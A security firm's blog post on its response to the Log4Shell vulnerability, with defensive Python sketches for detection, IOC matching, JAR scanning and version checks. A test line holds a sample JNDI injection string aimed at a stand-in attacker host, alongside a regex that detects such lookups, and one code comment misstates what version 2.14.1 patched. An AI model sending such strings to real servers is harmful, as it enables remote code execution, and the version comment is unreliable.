How Reliance acsn responded to the Log4J issue

As we reach the end of a year of enormous advances on both sides of the cyber security ‘arms race’, we thought we would share how Reliance acsn responded to the Log4J issue that has dominated the industry for almost two weeks now.

What is Log4Shell?

It’s hard to imagine that anyone in the IT industry hasn’t (probably unwillingly) become an overnight expert in obscure logging libraries, but in brief the news surrounded the widespread publication of a zero-day vulnerability that had left systems exposed for several weeks.  An Apache library named ‘Log4J 2’ – a logging framework used in numerous enterprise platforms – was vulnerable to a remote code execution attack.  If an application containing the framework logged non-sanitised input from a user, an attacker could inject a malicious lookup string into the logs, which the framework would then resolve and execute on the vulnerable server.  They could use this to open a C2 channel, for example.  This initial vulnerability gave rise to some related CVEs, which are listed at the end of the blog post.
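To make the mechanics concrete, here is a minimal sketch (in Python, purely illustrative – Log4J itself is a Java library) of the kind of naive pattern match defenders used to spot the classic injection string in their logs:

```python
import re

# Naive signature for the classic, un-obfuscated Log4Shell probe string.
# Real payloads were frequently obfuscated with nested lookups such as
# ${${lower:j}ndi:...}, so production detection rules had to be far more robust.
JNDI_PATTERN = re.compile(r"\$\{jndi:(?:ldap|ldaps|rmi|dns)://", re.IGNORECASE)

def looks_like_log4shell_probe(log_line: str) -> bool:
    """Return True if a log line contains a plain JNDI lookup string."""
    return bool(JNDI_PATTERN.search(log_line))

print(looks_like_log4shell_probe(
    "GET / HTTP/1.1 User-Agent: ${jndi:ldap://attacker.example/a}"))  # True
print(looks_like_log4shell_probe("GET /index.html HTTP/1.1"))         # False
```

Because the lookup syntax allows nesting and case manipulation, simple substring checks like this one caught only the earliest, noisiest scanning activity.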

What issues did Reliance acsn encounter?

Our two core managed service offerings are MSS – managing security devices on behalf of our clients – and MDR – detecting and responding to incidents.  Our client base is both numerous and diverse, and as a result we either support or monitor thousands of different devices, servers, services and applications.  Our clients wanted to know three key things:

1. “Are we vulnerable to this – and if so – have we been successfully targeted?”
2. “Is anything that Reliance acsn have deployed vulnerable to this?  Has anything that you’ve deployed been affected?”
3. “If we are vulnerable, what do we do about it?”

Fortunately, the community was quick to respond with some great information.  That included IOCs, known malicious domains/IPs, hotfixes, patches, recursive scanners and more.  The challenge became distilling the enormous volume of information into actionable intelligence for our clients.

How did Reliance acsn respond?

The news broke fully on 10th December 2021.  By the following day we’d notified our clients, added new rules and IOCs to our SIEM platforms, ingested additional (credible) threat intelligence, and set about answering the questions above.  With the right granularity of logs from affected servers, we could determine with some confidence whether a client had been successfully targeted – these became our priority cases for investigation and remediation.  Sadly, we found some issues.  Next we set about identifying any unsuccessful attempts that had been made, or the presence of any vulnerable platforms – whilst continuously ingesting intelligence to enrich our detection capacity.  Our clients received tailored information and detailed bespoke reports illustrating how they could find and fix any issues.
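As a rough illustration of the IOC-matching step described above (the hostnames and IPs here are made up; real indicators came from curated threat feeds):

```python
# Hypothetical indicators of compromise; real values were ingested from
# curated threat intelligence feeds as the incident developed.
MALICIOUS_HOSTS = {"attacker.example.com", "198.51.100.23"}

def match_iocs(log_line: str, iocs=MALICIOUS_HOSTS):
    """Return the set of known-bad hosts mentioned in a log line."""
    return {ioc for ioc in iocs if ioc in log_line}

print(match_iocs("outbound LDAP connection to 198.51.100.23:1389"))
# {'198.51.100.23'}
```

In practice this enrichment ran inside the SIEM rather than as standalone scripts, but the principle – sweep every log line against a continuously updated indicator set – is the same.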

Our MSS engineers added additional profiles and rules to deployed security devices to protect critical client infrastructure, whilst ensuring that our fielded technologies were appropriately protected.   The trick was to stay on top of advisories from vendors and ensure any new IPS/IDS signatures were included, and that our security devices had the right visibility to detect issues.  We then of course had to look just as hard at our own environment to determine if we were vulnerable.  Thankfully only a small handful of services were vulnerable, and these were carefully segmented from each other and the wider internet – so no chance of compromise.  Nevertheless, they had to be quickly patched!

What are some lessons learned?

One of the key issues was just how long it took some of our larger clients to identify the presence of the affected framework in their estates.  It really showed the value of central management consoles and routine vulnerability scanning.  Without these, the next CRITICAL vulnerability will pose the same problem for our clients: how can we patch it if we don’t know where to find it?  Next – a technical point – most firewalls can inspect encrypted traffic if correctly configured (SSL inspection).  If this isn’t enabled, our IPS/IDS profiles don’t work as well, since they can’t see the payload of each packet.  And finally, security teams must be willing to accept some risk and apply patches quickly.  A server performing a critical function is a reason to patch it quickly, not a reason not to.
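A minimal version of the recursive scan that answers “where is Log4J in our estate?” might look like the sketch below.  Path handling and nested “fat JAR” inspection are deliberately simplified here – the community scanners released during the incident were far more thorough:

```python
import os
import zipfile

def find_log4j_artefacts(root: str):
    """Walk a directory tree and flag Java archives that bundle the
    vulnerable JndiLookup class from Log4J 2.

    Simplified sketch: it does not recurse into JARs nested inside
    other JARs, which real scanners had to handle."""
    hits = []
    for dirpath, _dirs, filenames in os.walk(root):
        for name in filenames:
            if not name.endswith((".jar", ".war", ".ear")):
                continue
            path = os.path.join(dirpath, name)
            try:
                with zipfile.ZipFile(path) as archive:
                    if any(entry.endswith("core/lookup/JndiLookup.class")
                           for entry in archive.namelist()):
                        hits.append(path)
            except zipfile.BadZipFile:
                continue  # file has a Java-archive extension but isn't one
    return hits
```

Checking for the `JndiLookup.class` entry (rather than the JAR filename alone) is what catches Log4J copies repackaged inside application archives – exactly the copies that asset registers tended to miss.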

Crucially, for as long as critical servers face the internet with multiple software dependencies, issues like this will recur.  Adherence to a robust compliance standard will ensure that many of the foundations (vulnerability scanning, asset registers, IR plans etc.) are in place and ready to be mobilised in response.

What threats are associated with Log4Shell?

One of the most prominent and advanced ransomware groups, Conti, has been weaponising this vulnerability.  In addition, Khonsari and Tellyouthepass have also been reported using Log4Shell to their advantage.  Iranian and Chinese nation-state threat actors have been observed weaponising Log4Shell in the wild.  Reliance acsn have been actively tracking the above threats at the strategic, operational and tactical levels to ensure all of the newest techniques are being detected in our MDR service.

CVEs and patching:

Organizations should upgrade to Log4j 2.3.1 (for Java 6), 2.12.3 (for Java 7), or 2.17.0 (for Java 8 and later), or apply other workarounds, in order to mitigate the three associated CVEs – CVE-2021-44228, CVE-2021-45046 and CVE-2021-45105.
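As a sanity check during patching, the version thresholds above can be encoded in a few lines.  This sketch assumes plain “major.minor.patch” version strings; release candidates, the legacy 1.x line, and the fact that newer releases require newer Java runtimes are all out of scope:

```python
# Fixed Log4j 2 releases per Java runtime, as listed above.
FIXED = {"java6": (2, 3, 1), "java7": (2, 12, 3), "java8+": (2, 17, 0)}

def is_patched(version: str, runtime: str = "java8+") -> bool:
    """True if a Log4j 2 'x.y.z' version string meets or exceeds the
    fixed release for the given Java runtime."""
    parts = tuple(int(p) for p in version.split("."))
    return parts >= FIXED[runtime]

print(is_patched("2.17.0"))           # True
print(is_patched("2.14.1"))           # False  (patched 44228, not 45105)
print(is_patched("2.12.3", "java7"))  # True
```

A check like this is no substitute for a proper vulnerability scanner, but it makes the remediation target unambiguous when triaging a long list of discovered installs.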